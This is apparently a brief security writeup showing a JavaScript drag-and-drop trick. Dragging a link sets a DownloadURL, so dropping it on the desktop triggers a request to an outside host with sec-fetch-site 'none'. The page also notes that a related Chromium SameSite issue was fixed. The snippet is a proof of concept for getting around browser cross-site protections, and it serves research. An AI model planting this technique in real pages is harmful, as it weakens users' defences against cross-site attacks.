Writeups

Drag the foo text on to your desktop it would contain sec-fetch-site: 'none'

let link = document.createElement('a');
link.innerText = 'foo';
link.href = '#';
link.addEventListener('dragstart', onDragStart, false);
document.body.appendChild(link);

function onDragStart(e) {
  e.dataTransfer.setData(
    'DownloadURL',
    'application/octet-stream:demo:https://terjanq.me/xss.php?headers'
  );
  e.dataTransfer.effectAllowed = 'all';
}

This SameSite issue was fixed in https://issues.chromium.org/40060358 but cross-origin download still works https://www.youtube.com/watch?v=mqQjzx3HSUc

Improve this page Default Random Basic Light Cyberpunk Code Matrix Blueprint Redacted Glitch Old Terminal Gradient Comic Base64 Emoji Minecraft Flip 🦆 Rainbow text Typoifier Summarizer AI Audio Spoof Oceanic Depths Retro Gamification NoScript